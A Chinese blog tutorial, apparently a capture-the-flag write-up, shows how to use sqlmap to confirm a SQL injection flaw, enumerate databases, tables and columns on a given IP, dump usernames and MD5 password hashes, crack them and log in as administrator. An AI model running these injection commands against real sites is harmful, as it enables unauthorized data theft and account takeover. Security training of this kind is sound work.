sqlmap注入图文详解

sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,希望能给你带来帮助

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入and 1=1发现页面正常显示。

sqlmap注入图文详解

再次输入and 1=2页面出现错误,说明该页面可能存在sql注入漏洞

sqlmap注入图文详解

2.现在拿出我们的kali工具,sqlmap进行注入测试。

?

1

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 –dbs

sqlmap注入图文详解

3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

?

1

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -d stormgroup -tables

sqlmap注入图文详解

4.接下来查一下member中存在哪些列。

?

1

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -d stormgroup -t member –columns

sqlmap注入图文详解

5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

sqlmap注入图文详解

sqlmap注入图文详解

6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里

sqlmap注入图文详解

7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。

sqlmap注入图文详解

8.end 登录成功,拿到flag,提交。gameover !

总结

本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注钦钦技术栈的更多内容!

原文链接:https://blog.csdn.net/weixin_49071539/article/details/111375056

版权声明:本文(即:原文链接:https://www.qin1qin.com/catagory/6003/)内容由互联网用户自发投稿贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 630367839@qq.com 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022-07-27 9:53:47
下一篇 2022-07-27 9:53:57

软件定制开发公司

相关阅读

发表回复

登录后才能评论
通知:禁止投稿所有关于虚拟货币,币圈类相关文章,发现立即永久封锁账户ID!